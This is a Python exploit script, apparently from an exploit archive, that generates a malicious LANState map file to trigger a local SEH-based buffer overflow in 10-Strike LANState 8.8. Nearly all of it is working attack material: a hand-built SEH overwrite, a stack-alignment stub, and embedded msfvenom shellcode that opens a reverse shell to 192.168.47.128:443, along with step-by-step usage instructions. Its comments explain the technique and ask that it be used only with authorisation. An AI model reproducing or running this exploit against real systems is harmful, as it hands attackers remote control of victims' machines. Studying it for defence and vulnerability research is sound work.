# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/lanstate/download.shtml
# Version 8.8
# Tested on: Windows 7 SP 1 x86

# Usage: start a listener on the LHOST:LPORT baked into the shellcode (see the msfvenom
# command below), run this script, then in LANState use File -> Open and browse to the
# generated sploit.lsm; loading the map triggers the overflow and the reverse shell.
# If it doesn't work on the first try, close the map tab at the bottom and reopen the file.

#!/usr/bin/python
# (The shebang above is not on line 1, so it is ignored; run explicitly as `python <this file>`.)

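"""Generate a malicious LANState .lsm map file (SEH-based local buffer overflow).

Layout of the 4000-byte payload that replaces the two ``{0}`` fields of the
map template (ObjCaption and CHECK#0/HostAddr -- both receive the same
string, exactly as the original ``str.format`` call did):

    offset    0  'A' * 235          filler up to the SEH record
    offset  235  nseh (4 bytes)     short jump over the handler address
    offset  239  seh  (4 bytes)     POP POP RET inside LANState.exe
    offset  243  align_stack (19)   EAX = [esp+4] + 0x124; EDI = EAX
    offset  262  'A' * 265          filler
    offset  527  shellcode          msfvenom x86/alpha_mixed, BufferRegister=EDI
    then         'A' padding        brings the total to exactly 4000 bytes

Security notes for anyone reusing this:
  * The embedded shellcode is an opaque msfvenom blob that connects back to
    192.168.47.128:443.  Regenerate it with your own LHOST/LPORT (command
    below) rather than running bytes you did not produce, and keep the
    ``-e x86/alpha_mixed BufferRegister=EDI`` options: ``align_stack`` exists
    only to point EDI at the decoder, and the alphanumeric encoding is what
    lets the bytes survive the text-based map parser.
  * The POP POP RET address and the 235 / 265 / 0x124 distances are tied to
    the LANState 8.8 build the author tested on Windows 7 SP1 x86 (the
    template claims PROG_VER=8.85); re-verify them in a debugger against
    your target build -- LANState.exe is assumed not to be rebased by ASLR.
  * The output is written in binary mode so the 0xBA byte in the SEH
    address is not re-encoded as UTF-8 under Python 3 (a text-mode write
    would silently turn it into two bytes and break the handler address).
  * Use only against systems you are authorised to test.
"""

# Minimal LANState map: one host object whose caption and first check's
# HostAddr are both replaced by the overflow string.  Kept as bytes so the
# payload can be spliced in without any str/bytes conversion.
lsm = b"""[VERSION INFO]
PROG_NAME=LANState
PROG_VER=8.85
MAP_VER=8.3
MAPID=584636991

[OBJECT#4]
index=4
ObjName=
ObjCaption={0}
ObjHint=
ObjLink=
POS_X=100
POS_Y=0
Width=65
Height=65
ImageWidth=31
ImageHeight=32
StdImageIndex=1
ImageFilePath=
FontName=Arial
FontColor=0
FontSize=8
FontCharset=1
FontStyle=0
TextAlignment=2
TextLayout=0
ObjType=1
OBJ_ID=1
TYPE_ID=2
IP=
REMOTE_NAME=A
MAP_NAME=
MAC_ADDR=
OS=
SNMPAgent=0
SNMPVer=1
SNMPUname=
SNMPPassw=
SNMPPrivPassw=
SNMPSecLevel=0
SNMPAuthType=0
SNMPPrivType=0
Community=
ALWAYS_ON=0
ImageEnabled=0
ImageFile=
IPList=
CurrentUser=
DESCRIPT=
CheckInterval=60
DownTime1=0
DownTime1Start=12:00:00 AM
DownTime1Finish=12:00:00 AM
DownTime2=0
DownTime2Start=12:00:00 AM
DownTime2Finish=12:00:00 AM
DownTime3=0
DownTime3Start=12:00:00 AM
DownTime3Finish=12:00:00 AM
DownTime4=0
DownTime4Start=12:00:00 AM
DownTime4Finish=12:00:00 AM
DownTime5=0
DownTime5Start=12:00:00 AM
DownTime5Finish=12:00:00 AM
DownTime6=0
DownTime6Start=12:00:00 AM
DownTime6Finish=12:00:00 AM
DownTime7=0
DownTime7Start=12:00:00 AM
DownTime7Finish=12:00:00 AM
DTDoNotAlert=1
RunFirstOnly=0
FirstIsPassed=1
CHECK#0/HostAddr={0}
CHECK#0/CID=1
CHECK#0/NumRetries=1
CHECK#0/RetInterval=30
CHECK#0/IsMainCheck=0
CHECK#0/KeepStat=1
CHECK#0/CheckType=0
CHECK#0/CheckOn=1
CHECK#0/CheckRTTime=0
CHECK#0/RTTime=1000
CHECK#0/PacketsCount=4
CHECK#0/TimeOut=500
CHECK#0/SizeBuf=32

[VIEW]
FonImage=0
FonImageFile=
ImagePosition=0
ImageOffsetX=16
ImageOffsetY=16
ImgW=0
ImgH=0
ImgAutoSize=1
ScaleFactor=1
ScrollX=0
ScrollY=0
BkGroundColor=16777215
FontName=Arial
FontColor=-16777208
FontSize=8
FontCharset=1
FontStyle=0
Gradient=0
Color1=15780518
Color2=16777215
WebUseSmallIcons=0
CurIconSize=32
LockAreas=0
LockLines=0
LockHosts=0
WindowState=2
WindowTop=-10
WindowsLeft=12
WindowWidth=800
WindowsHeight=600

"""

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
# Alphanumeric decoder stub + encoded reverse shell.  The first two bytes
# (PUSH EDI / POP ECX) are why EDI must point at the start of this buffer.
# Replace the whole blob with your own msfvenom output before use.
shellcode = (
    b"\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
    b"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
    b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
    b"\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70"
    b"\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61"
    b"\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b"
    b"\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b"
    b"\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46"
    b"\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c"
    b"\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d"
    b"\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77"
    b"\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c"
    b"\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68"
    b"\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70"
    b"\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63"
    b"\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51"
    b"\x6a\x76\x74\x71\x6b\x4f\x6c\x4c\x6f\x31\x7a\x6f"
    b"\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75"
    b"\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d"
    b"\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78"
    b"\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c"
    b"\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63"
    b"\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69"
    b"\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71"
    b"\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f"
    b"\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d"
    b"\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30"
    b"\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34"
    b"\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f"
    b"\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30"
    b"\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69"
    b"\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70"
    b"\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30"
    b"\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50"
    b"\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48"
    b"\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42"
    b"\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a"
    b"\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75"
    b"\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50"
    b"\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55"
    b"\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36"
    b"\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44"
    b"\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47"
    b"\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76"
    b"\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74"
    b"\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54"
    b"\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70"
    b"\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e"
    b"\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79"
    b"\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79"
    b"\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70"
    b"\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f"
    b"\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66"
    b"\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f"
    b"\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70"
    b"\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77"
    b"\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63"
    b"\x79\x6f\x6e\x35\x41\x41"
)

# Stub that runs right after the SEH jump and leaves EDI pointing at the
# shellcode, as the alpha_mixed decoder (BufferRegister=EDI) requires.
# Two POPs put the second dword on the stack into EAX (presumably a pointer
# into the overflowed buffer near the SEH record -- confirm in a debugger);
# the three ADD immediates sum to 0x100000124, i.e. 0x124 = 292 after the
# 32-bit wrap, which is exactly nseh(4) + seh(4) + align_stack(19) + 265
# filler bytes.  A single ADD EAX,0x124 would contain null bytes; the split
# keeps the stub null-free.
align_stack = (
    b"\x58"                  # POP EAX
    b"\x58"                  # POP EAX
    b"\x05\x61\x55\x55\x55"  # ADD EAX,0x55555561
    b"\x05\x61\x55\x55\x55"  # ADD EAX,0x55555561
    b"\x05\x62\x56\x55\x55"  # ADD EAX,0x55555662
    b"\x50"                  # PUSH EAX
    b"\x5f"                  # POP EDI
)

# Next-SEH slot: JNO +6 / JO +4.  Exactly one of the two is taken, and both
# land 8 bytes past the start of nseh -- i.e. on align_stack, skipping over
# the 4-byte handler address.  Null-free alternative to a plain short JMP.
nseh = b"\x71\x06\x70\x04"

# 0x01BA7647: POP POP RET in LANState.exe (per the author), little-endian.
# Contains 0xBA, so the file must be written as raw bytes, not text.
seh = b"\x47\x76\xba\x01"


def build_payload():
    """Return the overflow string as bytes; always exactly 4000 bytes long.

    235 + 4 + 4 + 19 + 265 + len(shellcode) + (3492 - len(shellcode) - 19)
    == 4000 regardless of the shellcode's size, so a regenerated blob of a
    different length does not move the SEH record.
    """
    # Trailing filler sized so that the total stays at 4000 bytes.
    tail_pad = 3492 - len(shellcode + align_stack)
    return b"".join([
        b"\x41" * 235,
        nseh,
        seh,
        align_stack,
        b"\x41" * 265,
        shellcode,
        b"\x41" * tail_pad,
    ])


def build_map(payload):
    """Return the .lsm file contents (bytes) with *payload* in place of every ``{0}``.

    ``bytes.replace`` stands in for the original ``str.format`` call: the
    template has no other braces, so every ``{0}`` (ObjCaption and
    CHECK#0/HostAddr) gets the same payload, and the result stays raw bytes.
    """
    return lsm.replace(b"{0}", payload)


def main(out_path="sploit.lsm"):
    """Write the crafted map to *out_path* and report the payload size."""
    payload = build_payload()
    print("Size: " + str(len(payload)) + " bytes")
    # Binary mode: no newline translation and no text encoding of the 0xBA
    # byte in the SEH address (line endings are LF, as in the template above).
    with open(out_path, "wb") as fh:
        fh.write(build_map(payload))
    print("Map file created!")


if __name__ == "__main__":
    main()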